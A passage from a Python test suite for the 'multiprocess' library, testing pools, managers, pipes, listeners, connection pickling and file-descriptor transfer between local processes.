self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def _test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
self.assertRaises(ValueError, multiprocessing.Pool, -1)
self.assertRaises(ValueError, multiprocessing.Pool, 0)
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertLess(join.elapsed, 0.5)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with multiprocessing.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
raise AssertionError('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def _test_unpickleable_result(self):
from multiprocess.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocess.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
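# Illustrative sketch (not part of the original tests): the server/client
# split that _TestRemoteManager exercises.  One side serves the shared queue
# through QueueManager; the other side, knowing only the address and
# authkey, attaches to it with QueueManager2.connect().  The demo function
# below is hypothetical and never called by the suite; it uses the default
# pickle serializer rather than the xmlrpclib serializer used above.
def _example_remote_queue(authkey=b'example-key'):
    server = QueueManager(address=('localhost', 0), authkey=authkey)
    server.start()
    try:
        client = QueueManager2(address=server.address, authkey=authkey)
        client.connect()                     # attach to the running server
        client.get_queue().put('ping')
        assert server.get_queue().get() == 'ping'
    finally:
        server.shutdown()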
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)  # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
    def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
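# Illustrative sketch (not part of the original tests): the Listener/Client
# handshake exercised by the listener tests above, reduced to its smallest
# form.  The demo function is hypothetical and never called by the suite.
def _example_listener_client():
    with multiprocessing.connection.Listener() as listener:
        with multiprocessing.connection.Client(listener.address) as client:
            # The pending connection is queued, so accept() returns at once.
            with listener.accept() as server_side:
                client.send('ping')
                assert server_side.recv() == 'ping'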
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocess import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
